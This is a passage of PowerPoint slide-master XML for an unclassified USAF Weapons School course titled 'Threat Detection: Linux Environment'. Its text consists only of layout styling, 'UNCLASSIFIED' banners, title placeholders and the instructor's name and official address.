            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184332" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6494466"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1036"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="1028703" y="5408870"/>
            <a:ext cx="10117451" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instructor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Maj Patrick “Shrink” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Vinge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005480" y="1598613"/>
            <a:ext cx="10164233" cy="2176462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9B03"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9B03"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> Detection: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9B03"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9B03"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Linux Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9B03"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095503" y="346075"/>
            <a:ext cx="7994651" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CWU918KD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-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auto">
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="649224">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="978408">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1316736">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1645920" indent="-319088">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="8064500" algn="l"/>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="2130427" y="200025"/>
            <a:ext cx="7912608" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit master</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lumn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p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit master title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="573904" y="1595441"/>
            <a:ext cx="5486400" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="649224" indent="-319088">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="978408">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1316736">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1645920">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="1800"/>
            </a:lvl9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bwMode="auto">
          <a:xfrm>
            <a:off x="6263504" y="1595441"/>
            <a:ext cx="5486400" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="649224">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="978408">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1316736">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1645920">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="1800"/>
            </a:lvl9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slid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p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit master title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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="511380" y="1598143"/>
            <a:ext cx="11165417" cy="4808537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-320040" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="3430588" algn="l"/>
                <a:tab pos="8064500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instructor’s name:	Maj Patrick “Shrink” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Vinge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-320040" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="3430588" algn="l"/>
                <a:tab pos="8064500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instructor’s address:	USAF Weapons School</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>	4269 Tyndall Avenue</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>	Nellis AFB NV 89191-6062</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-320040" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="3430588" algn="l"/>
                <a:tab pos="8064500" algn="l"/>
              </a:tabLst>
            </a:pPr>
